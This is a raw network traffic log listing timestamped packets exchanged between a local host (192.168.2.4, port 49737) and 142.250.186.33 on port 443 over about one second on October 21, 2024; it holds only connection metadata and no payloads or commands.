Oct 21, 2024 11:16:50.084887028 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.084971905 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.085022926 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.170561075 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.170640945 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.170655012 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.170702934 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.170751095 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.170797110 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.170835018 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.170881033 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.170927048 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.170975924 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.185920954 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.185972929 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.186048031 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.186108112 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.190778017 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.190826893 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.190856934 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.190907955 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.200396061 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.200459957 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.200474977 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.200520039 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.200597048 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.200648069 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.286297083 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.286412954 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.286482096 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.286537886 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.286578894 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.286643982 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.286659002 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.286729097 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.301959991 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.302011967 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.302074909 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.302304983 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.306886911 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.306941032 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.306966066 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.307015896 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.316271067 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.316329956 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.316359997 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.316410065 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.316451073 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.316504002 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.402069092 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.402203083 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.402240038 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.402295113 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.402331114 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.402379036 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.402435064 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.402482033 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.402512074 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.402559996 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.417670012 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.417740107 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.417752028 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.417800903 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.417850971 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.417917013 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.422342062 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.422398090 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.422421932 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.422468901 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.431993961 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.432054996 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.432076931 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.432123899 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.434320927 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.434377909 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.474993944 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.475065947 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.517678022 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.517776012 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.517787933 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.517848015 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.517918110 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.517976046 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.533484936 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.533560038 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.533571959 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.533642054 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.538003922 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.538074017 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.538084030 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.538130999 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.547725916 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.547785044 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.547842026 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.547894001 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.550184965 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.550242901 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.550256968 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.550304890 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.631314993 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.631401062 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.633698940 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.633752108 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.633774042 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.633871078 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.633897066 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.633939981 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.649431944 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.649488926 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.649504900 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.649552107 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.649585009 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.649632931 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.653769970 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.653816938 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.653852940 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.653896093 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.654059887 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.654099941 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.654150963 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.654192924 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.663516998 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.663559914 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.663635015 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.663672924 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.665994883 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.666038990 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.666085958 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.666126013 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.749478102 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.749644995 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.749660015 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.749707937 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.765012026 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.765165091 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.765172958 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.765219927 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.769747972 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.769802094 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.769844055 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.769887924 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.769934893 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.769979954 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.770025015 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.770070076 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.779433966 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.779489994 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.779552937 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.779593945 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.782016039 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.782067060 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.782119036 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.782222986 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.782289028 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.782340050 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.865334034 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.865410089 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.865446091 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.865489960 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.865550995 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.865602970 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.880806923 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.880883932 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.880927086 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.880975962 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.885493040 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.885567904 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.885593891 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.885644913 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.885711908 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.885761976 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.885823965 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.885864019 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.895147085 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.895216942 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.895250082 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.895375013 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.895503044 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.895560026 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.897643089 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.897705078 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.897738934 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.897797108 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.897833109 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.897883892 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.981230974 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.981307030 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.981345892 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.981400013 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.996617079 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.996673107 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.996737957 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.996787071 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.001310110 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.001359940 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.001405001 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.001455069 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.001501083 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.001554012 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.001609087 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.001662016 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.011168003 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.011239052 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.011310101 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.011363029 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.013350964 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.013402939 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.013446093 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.013508081 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.013547897 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.013597965 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.013654947 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.013703108 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.013746977 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.013797045 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.013847113 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.013894081 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.096904993 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.096988916 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.097032070 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.097083092 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.112421036 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.112492085 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.112525940 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.112572908 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.117065907 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.117117882 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.117202997 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.117247105 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.117300034 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.117348909 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.117396116 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.117444992 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.126928091 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.126979113 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.127042055 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.127084970 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.129075050 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.129126072 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.129189014 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.129252911 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.129282951 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.129336119 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.129410028 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.129465103 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.175163031 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.175239086 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.175307035 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.175359964 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.438674927 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.438900948 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.438924074 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.438941956 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.438956976 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.438992977 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.439004898 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.439052105 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.439100027 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.439151049 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.439202070 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.439253092 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.439328909 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.439376116 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.439481020 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.439529896 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.439594984 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.439644098 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.439687967 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.439738989 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.439780951 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.439831972 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.439879894 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.439929008 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.439970970 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.440030098 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.440144062 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.440196991 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.440239906 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.440291882 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.440330982 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.440380096 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.440424919 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.440473080 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.440521002 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.440572023 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.440613985 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.440664053 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.440706968 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.440754890 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.440798044 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.440845966 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.440887928 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.440941095 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.441063881 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.441112995 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.441159964 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.441207886 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.441252947 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.441303968 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.441358089 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.441406012 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.441446066 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.441498995 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.446221113 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.446273088 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.446340084 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.446391106 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.446435928 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.446486950 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.446527958 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.446579933 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.446626902 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.446675062 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.446715117 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.446762085 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.447535992 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.447587967 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.447633982 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.447684050 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.447741985 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.447789907 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.447849035 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.447900057 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.461982965 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.462137938 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.462146044 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.462207079 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.465105057 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.465158939 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.465199947 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.465248108 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:51.465293884 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:51.465346098 CEST	49737	443	192.168.2.4	142.250.186.33
